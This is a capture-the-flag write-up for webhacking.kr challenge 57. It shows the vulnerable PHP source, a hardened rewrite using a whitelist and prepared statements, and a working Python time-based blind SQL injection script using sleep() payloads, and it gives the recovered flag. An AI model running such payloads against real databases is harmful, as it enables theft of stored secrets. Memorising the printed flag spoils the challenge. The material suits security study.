old-57 (600)

This is the initial screen.

Clicking view-source shows the following source.

<?php
  include "../../config.php";
  include "./flag.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 57</title>
</head>
<body>
<?php
  $db = dbconnect();
  if($_GET['msg'] && isset($_GET['se'])){
    $_GET['msg'] = addslashes($_GET['msg']);
    $_GET['se'] = addslashes($_GET['se']);
    if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
    mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
    echo "Done<br><br>";
    if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
  }
?>
<form method=get action=index.php>
<table border=0>
<tr><td>message</td><td><input name=msg size=50 maxlength=50></td></tr>
<tr><td>secret</td><td><input type=radio name=se value=1 checked>yes<br><br><input type=radio name=se value=0>no</td></tr>
<tr><td colspan=2 align=center><input type=submit></td></tr>
</table>
</form>
<br><br><a href=./?view_source=1>view-source</a>
</body>
</html>

Entering abc in the form and submitting it shows the following.

Since the output value is fixed, I recognized this as a Time-based Blind SQL Injection.
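As an added example (not part of the original write-up or the challenge's own code), this is what a hardened version of the INSERT in the source above looks like: the radio value is whitelisted to 0 or 1 and a prepared statement replaces string interpolation, so the keyword blacklist (which `if(...,sleep(10),1)` passes because it contains none of the blocked words) is no longer load-bearing. It assumes the same `$db` mysqli connection and `$flag` from flag.php as the original source; the function name `save_message` is my own.

```php
<?php
// Added example, not the challenge's code: hardened form of the chall57 INSERT.
// Assumes $db is a mysqli connection and $flag comes from flag.php (as on the page).

function save_message(mysqli $db, string $session_id, string $msg, string $se, string $flag): bool
{
    // 'se' comes from a radio button, so only "0" and "1" are legitimate.
    // A strict whitelist replaces the regex blacklist: the original check
    // looks for select/and/or/not/&/|/benchmark, none of which appear in
    // if(length(pw)=24,sleep(10),1), so that payload was interpolated unquoted.
    if ($se !== '0' && $se !== '1') {
        return false;
    }
    $op = (int) $se;

    // Prepared statement: msg, pw and op are sent as bound data, never as SQL
    // text, so addslashes() is unnecessary (and was never a complete defence
    // for the unquoted numeric column anyway).
    $stmt = $db->prepare(
        'INSERT INTO chall57 (id, msg, pw, op) VALUES (?, ?, ?, ?)'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('sssi', $session_id, $msg, $flag, $op);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Usage mirroring the original handler (hypothetical glue, not the page's code):
// if (isset($_GET['msg'], $_GET['se']) && $_GET['msg'] !== '') {
//     echo save_message($db, $_SESSION['id'], $_GET['msg'], $_GET['se'], $flag)
//         ? "Done<br><br>" : "Access Denied";
// }
```

With the whitelist in place, an injected `se` is rejected before any query runs, and with bound parameters even a value that slipped past validation could not change the statement's structure.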

The Python code is as follows.

import requests
import time

URL = 'https://webhacking.kr/challenge/web-34/index.php?msg=abc&se='
SLEEP = 10


def query(payload):
    # Send the payload as the unquoted 'se' value and time the response.
    # A response slower than SLEEP seconds means the injected condition was true.
    start = time.time()
    requests.get(URL + payload)
    return time.time() - start > SLEEP


# Result: 24
def find_flag_length():
    flag_len = 1
    # Increase the candidate length until the server sleeps, i.e. length(pw) matches.
    while not query('if(length(pw)={},sleep({}),1)'.format(flag_len, SLEEP)):
        flag_len += 1
    print('flag_len: {}'.format(flag_len))
    return flag_len


# Result: FLAG{y2u.be/kmPgjr0EL64}
def find_flag(flag_len):
    flag = ''
    # Recover pw one character at a time by testing each ASCII value at each position.
    for pos in range(1, flag_len + 1):
        for character in range(0, 128):
            if query('if(ascii(substr(pw,{},1))={},sleep({}),1)'.format(pos, character, SLEEP)):
                flag += chr(character)
                break
    print('flag: {}'.format(flag))
    return flag


find_flag(find_flag_length())

Running it, the flag is FLAG{y2u.be/kmPgjr0EL64}.

Entering the flag in the Auth box and submitting it solves the challenge.
